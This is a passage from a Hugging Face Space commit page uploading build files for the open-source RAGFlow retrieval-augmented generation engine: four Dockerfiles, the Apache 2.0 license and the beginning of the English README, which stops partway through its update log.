Spaces:
Paused
Paused
jianglinzhang
commited on
Commit
•
1192360
1
Parent(s):
8a44cb6
Upload 14 files
Browse files- Dockerfile.arm +43 -0
- Dockerfile.cuda +27 -0
- Dockerfile.scratch +56 -0
- Dockerfile.scratch.oc9 +58 -0
- LICENSE +201 -0
- README.md +342 -11
- README_ja.md +289 -0
- README_ko.md +325 -0
- README_zh.md +329 -0
- SECURITY.md +74 -0
- printEnvironment.sh +67 -0
- requirements.txt +104 -0
- requirements_arm.txt +175 -0
Dockerfile.arm
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
FROM python:3.11
|
2 |
+
USER root
|
3 |
+
|
4 |
+
WORKDIR /ragflow
|
5 |
+
|
6 |
+
COPY requirements_arm.txt /ragflow/requirements.txt
|
7 |
+
|
8 |
+
|
9 |
+
RUN pip install nltk --default-timeout=10000
|
10 |
+
|
11 |
+
RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
|
12 |
+
python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
|
13 |
+
|
14 |
+
RUN apt-get update && \
|
15 |
+
apt-get install -y curl gnupg && \
|
16 |
+
rm -rf /var/lib/apt/lists/*
|
17 |
+
|
18 |
+
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
|
19 |
+
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
|
20 |
+
|
21 |
+
RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
|
22 |
+
ENV PATH="/root/.cargo/bin:${PATH}"
|
23 |
+
|
24 |
+
RUN pip install graspologic
|
25 |
+
|
26 |
+
ADD ./web ./web
|
27 |
+
RUN cd ./web && npm i --force && npm run build
|
28 |
+
|
29 |
+
ADD ./api ./api
|
30 |
+
ADD ./conf ./conf
|
31 |
+
ADD ./deepdoc ./deepdoc
|
32 |
+
ADD ./rag ./rag
|
33 |
+
ADD ./agent ./agent
|
34 |
+
ADD ./graphrag ./graphrag
|
35 |
+
|
36 |
+
ENV PYTHONPATH=/ragflow/
|
37 |
+
ENV HF_ENDPOINT=https://hf-mirror.com
|
38 |
+
|
39 |
+
ADD docker/entrypoint.sh ./entrypoint.sh
|
40 |
+
ADD docker/.env ./
|
41 |
+
RUN chmod +x ./entrypoint.sh
|
42 |
+
|
43 |
+
ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.cuda
ADDED
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
FROM infiniflow/ragflow-base:v2.0
|
2 |
+
USER root
|
3 |
+
|
4 |
+
WORKDIR /ragflow
|
5 |
+
|
6 |
+
## for cuda > 12.0
|
7 |
+
RUN pip uninstall -y onnxruntime-gpu
|
8 |
+
RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
9 |
+
|
10 |
+
|
11 |
+
ADD ./web ./web
|
12 |
+
RUN cd ./web && npm i --force && npm run build
|
13 |
+
|
14 |
+
ADD ./api ./api
|
15 |
+
ADD ./conf ./conf
|
16 |
+
ADD ./deepdoc ./deepdoc
|
17 |
+
ADD ./rag ./rag
|
18 |
+
ADD ./agent ./agent
|
19 |
+
ADD ./graphrag ./graphrag
|
20 |
+
|
21 |
+
ENV PYTHONPATH=/ragflow/
|
22 |
+
ENV HF_ENDPOINT=https://hf-mirror.com
|
23 |
+
|
24 |
+
ADD docker/entrypoint.sh ./entrypoint.sh
|
25 |
+
RUN chmod +x ./entrypoint.sh
|
26 |
+
|
27 |
+
ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.scratch
ADDED
@@ -0,0 +1,56 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
FROM ubuntu:22.04
|
2 |
+
USER root
|
3 |
+
|
4 |
+
WORKDIR /ragflow
|
5 |
+
|
6 |
+
RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
|
7 |
+
|
8 |
+
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
9 |
+
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
10 |
+
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
11 |
+
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
12 |
+
echo "conda activate base" >> ~/.bashrc
|
13 |
+
|
14 |
+
ENV PATH /root/miniconda3/bin:$PATH
|
15 |
+
|
16 |
+
RUN conda create -y --name py11 python=3.11
|
17 |
+
|
18 |
+
ENV CONDA_DEFAULT_ENV py11
|
19 |
+
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
20 |
+
ENV PATH $CONDA_PREFIX/bin:$PATH
|
21 |
+
|
22 |
+
RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
|
23 |
+
RUN apt-get install -y nodejs
|
24 |
+
|
25 |
+
RUN apt-get install -y nginx
|
26 |
+
|
27 |
+
ADD ./web ./web
|
28 |
+
ADD ./api ./api
|
29 |
+
ADD ./conf ./conf
|
30 |
+
ADD ./deepdoc ./deepdoc
|
31 |
+
ADD ./rag ./rag
|
32 |
+
ADD ./requirements.txt ./requirements.txt
|
33 |
+
ADD ./agent ./agent
|
34 |
+
ADD ./graphrag ./graphrag
|
35 |
+
|
36 |
+
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
|
37 |
+
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
|
38 |
+
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
39 |
+
RUN cd ./web && npm i --force && npm run build
|
40 |
+
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
|
41 |
+
|
42 |
+
RUN apt-get update && \
|
43 |
+
apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
|
44 |
+
rm -rf /var/lib/apt/lists/*
|
45 |
+
|
46 |
+
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
|
47 |
+
RUN conda run -n py11 python -m nltk.downloader punkt
|
48 |
+
RUN conda run -n py11 python -m nltk.downloader wordnet
|
49 |
+
|
50 |
+
ENV PYTHONPATH=/ragflow/
|
51 |
+
ENV HF_ENDPOINT=https://hf-mirror.com
|
52 |
+
|
53 |
+
ADD docker/entrypoint.sh ./entrypoint.sh
|
54 |
+
RUN chmod +x ./entrypoint.sh
|
55 |
+
|
56 |
+
ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.scratch.oc9
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
FROM opencloudos/opencloudos:9.0
|
2 |
+
USER root
|
3 |
+
|
4 |
+
WORKDIR /ragflow
|
5 |
+
|
6 |
+
RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
|
7 |
+
|
8 |
+
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
9 |
+
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
10 |
+
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
11 |
+
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
12 |
+
echo "conda activate base" >> ~/.bashrc
|
13 |
+
|
14 |
+
ENV PATH /root/miniconda3/bin:$PATH
|
15 |
+
|
16 |
+
RUN conda create -y --name py11 python=3.11
|
17 |
+
|
18 |
+
ENV CONDA_DEFAULT_ENV py11
|
19 |
+
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
20 |
+
ENV PATH $CONDA_PREFIX/bin:$PATH
|
21 |
+
|
22 |
+
# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
|
23 |
+
RUN dnf install -y nodejs
|
24 |
+
|
25 |
+
RUN dnf install -y nginx
|
26 |
+
|
27 |
+
ADD ./web ./web
|
28 |
+
ADD ./api ./api
|
29 |
+
ADD ./conf ./conf
|
30 |
+
ADD ./deepdoc ./deepdoc
|
31 |
+
ADD ./rag ./rag
|
32 |
+
ADD ./requirements.txt ./requirements.txt
|
33 |
+
ADD ./agent ./agent
|
34 |
+
ADD ./graphrag ./graphrag
|
35 |
+
|
36 |
+
RUN dnf install -y openmpi openmpi-devel python3-openmpi
|
37 |
+
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
|
38 |
+
ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
|
39 |
+
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
40 |
+
RUN cd ./web && npm i --force && npm run build
|
41 |
+
RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
|
42 |
+
RUN conda run -n py11 pip install redis
|
43 |
+
|
44 |
+
RUN dnf update -y && \
|
45 |
+
dnf install -y glib2 mesa-libGL && \
|
46 |
+
dnf clean all
|
47 |
+
|
48 |
+
RUN conda run -n py11 pip install ollama
|
49 |
+
RUN conda run -n py11 python -m nltk.downloader punkt
|
50 |
+
RUN conda run -n py11 python -m nltk.downloader wordnet
|
51 |
+
|
52 |
+
ENV PYTHONPATH=/ragflow/
|
53 |
+
ENV HF_ENDPOINT=https://hf-mirror.com
|
54 |
+
|
55 |
+
ADD docker/entrypoint.sh ./entrypoint.sh
|
56 |
+
RUN chmod +x ./entrypoint.sh
|
57 |
+
|
58 |
+
ENTRYPOINT ["./entrypoint.sh"]
|
LICENSE
ADDED
@@ -0,0 +1,201 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
Apache License
|
2 |
+
Version 2.0, January 2004
|
3 |
+
http://www.apache.org/licenses/
|
4 |
+
|
5 |
+
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
6 |
+
|
7 |
+
1. Definitions.
|
8 |
+
|
9 |
+
"License" shall mean the terms and conditions for use, reproduction,
|
10 |
+
and distribution as defined by Sections 1 through 9 of this document.
|
11 |
+
|
12 |
+
"Licensor" shall mean the copyright owner or entity authorized by
|
13 |
+
the copyright owner that is granting the License.
|
14 |
+
|
15 |
+
"Legal Entity" shall mean the union of the acting entity and all
|
16 |
+
other entities that control, are controlled by, or are under common
|
17 |
+
control with that entity. For the purposes of this definition,
|
18 |
+
"control" means (i) the power, direct or indirect, to cause the
|
19 |
+
direction or management of such entity, whether by contract or
|
20 |
+
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
21 |
+
outstanding shares, or (iii) beneficial ownership of such entity.
|
22 |
+
|
23 |
+
"You" (or "Your") shall mean an individual or Legal Entity
|
24 |
+
exercising permissions granted by this License.
|
25 |
+
|
26 |
+
"Source" form shall mean the preferred form for making modifications,
|
27 |
+
including but not limited to software source code, documentation
|
28 |
+
source, and configuration files.
|
29 |
+
|
30 |
+
"Object" form shall mean any form resulting from mechanical
|
31 |
+
transformation or translation of a Source form, including but
|
32 |
+
not limited to compiled object code, generated documentation,
|
33 |
+
and conversions to other media types.
|
34 |
+
|
35 |
+
"Work" shall mean the work of authorship, whether in Source or
|
36 |
+
Object form, made available under the License, as indicated by a
|
37 |
+
copyright notice that is included in or attached to the work
|
38 |
+
(an example is provided in the Appendix below).
|
39 |
+
|
40 |
+
"Derivative Works" shall mean any work, whether in Source or Object
|
41 |
+
form, that is based on (or derived from) the Work and for which the
|
42 |
+
editorial revisions, annotations, elaborations, or other modifications
|
43 |
+
represent, as a whole, an original work of authorship. For the purposes
|
44 |
+
of this License, Derivative Works shall not include works that remain
|
45 |
+
separable from, or merely link (or bind by name) to the interfaces of,
|
46 |
+
the Work and Derivative Works thereof.
|
47 |
+
|
48 |
+
"Contribution" shall mean any work of authorship, including
|
49 |
+
the original version of the Work and any modifications or additions
|
50 |
+
to that Work or Derivative Works thereof, that is intentionally
|
51 |
+
submitted to Licensor for inclusion in the Work by the copyright owner
|
52 |
+
or by an individual or Legal Entity authorized to submit on behalf of
|
53 |
+
the copyright owner. For the purposes of this definition, "submitted"
|
54 |
+
means any form of electronic, verbal, or written communication sent
|
55 |
+
to the Licensor or its representatives, including but not limited to
|
56 |
+
communication on electronic mailing lists, source code control systems,
|
57 |
+
and issue tracking systems that are managed by, or on behalf of, the
|
58 |
+
Licensor for the purpose of discussing and improving the Work, but
|
59 |
+
excluding communication that is conspicuously marked or otherwise
|
60 |
+
designated in writing by the copyright owner as "Not a Contribution."
|
61 |
+
|
62 |
+
"Contributor" shall mean Licensor and any individual or Legal Entity
|
63 |
+
on behalf of whom a Contribution has been received by Licensor and
|
64 |
+
subsequently incorporated within the Work.
|
65 |
+
|
66 |
+
2. Grant of Copyright License. Subject to the terms and conditions of
|
67 |
+
this License, each Contributor hereby grants to You a perpetual,
|
68 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
69 |
+
copyright license to reproduce, prepare Derivative Works of,
|
70 |
+
publicly display, publicly perform, sublicense, and distribute the
|
71 |
+
Work and such Derivative Works in Source or Object form.
|
72 |
+
|
73 |
+
3. Grant of Patent License. Subject to the terms and conditions of
|
74 |
+
this License, each Contributor hereby grants to You a perpetual,
|
75 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
76 |
+
(except as stated in this section) patent license to make, have made,
|
77 |
+
use, offer to sell, sell, import, and otherwise transfer the Work,
|
78 |
+
where such license applies only to those patent claims licensable
|
79 |
+
by such Contributor that are necessarily infringed by their
|
80 |
+
Contribution(s) alone or by combination of their Contribution(s)
|
81 |
+
with the Work to which such Contribution(s) was submitted. If You
|
82 |
+
institute patent litigation against any entity (including a
|
83 |
+
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
84 |
+
or a Contribution incorporated within the Work constitutes direct
|
85 |
+
or contributory patent infringement, then any patent licenses
|
86 |
+
granted to You under this License for that Work shall terminate
|
87 |
+
as of the date such litigation is filed.
|
88 |
+
|
89 |
+
4. Redistribution. You may reproduce and distribute copies of the
|
90 |
+
Work or Derivative Works thereof in any medium, with or without
|
91 |
+
modifications, and in Source or Object form, provided that You
|
92 |
+
meet the following conditions:
|
93 |
+
|
94 |
+
(a) You must give any other recipients of the Work or
|
95 |
+
Derivative Works a copy of this License; and
|
96 |
+
|
97 |
+
(b) You must cause any modified files to carry prominent notices
|
98 |
+
stating that You changed the files; and
|
99 |
+
|
100 |
+
(c) You must retain, in the Source form of any Derivative Works
|
101 |
+
that You distribute, all copyright, patent, trademark, and
|
102 |
+
attribution notices from the Source form of the Work,
|
103 |
+
excluding those notices that do not pertain to any part of
|
104 |
+
the Derivative Works; and
|
105 |
+
|
106 |
+
(d) If the Work includes a "NOTICE" text file as part of its
|
107 |
+
distribution, then any Derivative Works that You distribute must
|
108 |
+
include a readable copy of the attribution notices contained
|
109 |
+
within such NOTICE file, excluding those notices that do not
|
110 |
+
pertain to any part of the Derivative Works, in at least one
|
111 |
+
of the following places: within a NOTICE text file distributed
|
112 |
+
as part of the Derivative Works; within the Source form or
|
113 |
+
documentation, if provided along with the Derivative Works; or,
|
114 |
+
within a display generated by the Derivative Works, if and
|
115 |
+
wherever such third-party notices normally appear. The contents
|
116 |
+
of the NOTICE file are for informational purposes only and
|
117 |
+
do not modify the License. You may add Your own attribution
|
118 |
+
notices within Derivative Works that You distribute, alongside
|
119 |
+
or as an addendum to the NOTICE text from the Work, provided
|
120 |
+
that such additional attribution notices cannot be construed
|
121 |
+
as modifying the License.
|
122 |
+
|
123 |
+
You may add Your own copyright statement to Your modifications and
|
124 |
+
may provide additional or different license terms and conditions
|
125 |
+
for use, reproduction, or distribution of Your modifications, or
|
126 |
+
for any such Derivative Works as a whole, provided Your use,
|
127 |
+
reproduction, and distribution of the Work otherwise complies with
|
128 |
+
the conditions stated in this License.
|
129 |
+
|
130 |
+
5. Submission of Contributions. Unless You explicitly state otherwise,
|
131 |
+
any Contribution intentionally submitted for inclusion in the Work
|
132 |
+
by You to the Licensor shall be under the terms and conditions of
|
133 |
+
this License, without any additional terms or conditions.
|
134 |
+
Notwithstanding the above, nothing herein shall supersede or modify
|
135 |
+
the terms of any separate license agreement you may have executed
|
136 |
+
with Licensor regarding such Contributions.
|
137 |
+
|
138 |
+
6. Trademarks. This License does not grant permission to use the trade
|
139 |
+
names, trademarks, service marks, or product names of the Licensor,
|
140 |
+
except as required for reasonable and customary use in describing the
|
141 |
+
origin of the Work and reproducing the content of the NOTICE file.
|
142 |
+
|
143 |
+
7. Disclaimer of Warranty. Unless required by applicable law or
|
144 |
+
agreed to in writing, Licensor provides the Work (and each
|
145 |
+
Contributor provides its Contributions) on an "AS IS" BASIS,
|
146 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
147 |
+
implied, including, without limitation, any warranties or conditions
|
148 |
+
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
149 |
+
PARTICULAR PURPOSE. You are solely responsible for determining the
|
150 |
+
appropriateness of using or redistributing the Work and assume any
|
151 |
+
risks associated with Your exercise of permissions under this License.
|
152 |
+
|
153 |
+
8. Limitation of Liability. In no event and under no legal theory,
|
154 |
+
whether in tort (including negligence), contract, or otherwise,
|
155 |
+
unless required by applicable law (such as deliberate and grossly
|
156 |
+
negligent acts) or agreed to in writing, shall any Contributor be
|
157 |
+
liable to You for damages, including any direct, indirect, special,
|
158 |
+
incidental, or consequential damages of any character arising as a
|
159 |
+
result of this License or out of the use or inability to use the
|
160 |
+
Work (including but not limited to damages for loss of goodwill,
|
161 |
+
work stoppage, computer failure or malfunction, or any and all
|
162 |
+
other commercial damages or losses), even if such Contributor
|
163 |
+
has been advised of the possibility of such damages.
|
164 |
+
|
165 |
+
9. Accepting Warranty or Additional Liability. While redistributing
|
166 |
+
the Work or Derivative Works thereof, You may choose to offer,
|
167 |
+
and charge a fee for, acceptance of support, warranty, indemnity,
|
168 |
+
or other liability obligations and/or rights consistent with this
|
169 |
+
License. However, in accepting such obligations, You may act only
|
170 |
+
on Your own behalf and on Your sole responsibility, not on behalf
|
171 |
+
of any other Contributor, and only if You agree to indemnify,
|
172 |
+
defend, and hold each Contributor harmless for any liability
|
173 |
+
incurred by, or claims asserted against, such Contributor by reason
|
174 |
+
of your accepting any such warranty or additional liability.
|
175 |
+
|
176 |
+
END OF TERMS AND CONDITIONS
|
177 |
+
|
178 |
+
APPENDIX: How to apply the Apache License to your work.
|
179 |
+
|
180 |
+
To apply the Apache License to your work, attach the following
|
181 |
+
boilerplate notice, with the fields enclosed by brackets "[]"
|
182 |
+
replaced with your own identifying information. (Don't include
|
183 |
+
the brackets!) The text should be enclosed in the appropriate
|
184 |
+
comment syntax for the file format. We also recommend that a
|
185 |
+
file or class name and description of purpose be included on the
|
186 |
+
same "printed page" as the copyright notice for easier
|
187 |
+
identification within third-party archives.
|
188 |
+
|
189 |
+
Copyright [yyyy] [name of copyright owner]
|
190 |
+
|
191 |
+
Licensed under the Apache License, Version 2.0 (the "License");
|
192 |
+
you may not use this file except in compliance with the License.
|
193 |
+
You may obtain a copy of the License at
|
194 |
+
|
195 |
+
http://www.apache.org/licenses/LICENSE-2.0
|
196 |
+
|
197 |
+
Unless required by applicable law or agreed to in writing, software
|
198 |
+
distributed under the License is distributed on an "AS IS" BASIS,
|
199 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
200 |
+
See the License for the specific language governing permissions and
|
201 |
+
limitations under the License.
|
README.md
CHANGED
@@ -1,11 +1,342 @@
|
|
1 |
-
|
2 |
-
|
3 |
-
|
4 |
-
|
5 |
-
|
6 |
-
|
7 |
-
|
8 |
-
|
9 |
-
|
10 |
-
|
11 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
<details open>
|
36 |
+
<summary></b>📕 Table of Contents</b></summary>
|
37 |
+
|
38 |
+
- 💡 [What is RAGFlow?](#-what-is-ragflow)
|
39 |
+
- 🎮 [Demo](#-demo)
|
40 |
+
- 📌 [Latest Updates](#-latest-updates)
|
41 |
+
- 🌟 [Key Features](#-key-features)
|
42 |
+
- 🔎 [System Architecture](#-system-architecture)
|
43 |
+
- 🎬 [Get Started](#-get-started)
|
44 |
+
- 🔧 [Configurations](#-configurations)
|
45 |
+
- 🛠️ [Build from source](#-build-from-source)
|
46 |
+
- 🛠️ [Launch service from source](#-launch-service-from-source)
|
47 |
+
- 📚 [Documentation](#-documentation)
|
48 |
+
- 📜 [Roadmap](#-roadmap)
|
49 |
+
- 🏄 [Community](#-community)
|
50 |
+
- 🙌 [Contributing](#-contributing)
|
51 |
+
|
52 |
+
</details>
|
53 |
+
|
54 |
+
## 💡 What is RAGFlow?
|
55 |
+
|
56 |
+
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
57 |
+
|
58 |
+
## 🎮 Demo
|
59 |
+
|
60 |
+
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
61 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
62 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
63 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
64 |
+
</div>
|
65 |
+
|
66 |
+
|
67 |
+
## 🔥 Latest Updates
|
68 |
+
|
69 |
+
- 2024-09-13 Adds search mode for knowledge base Q&A.
|
70 |
+
- 2024-09-09 Adds a medical consultant agent template.
|
71 |
+
- 2024-08-22 Support text to SQL statements through RAG.
|
72 |
+
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
|
73 |
+
- 2024-07-23 Supports audio file parsing.
|
74 |
+
- 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
|
75 |
+
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files, extracting tables from Markdown files.
|
76 |
+
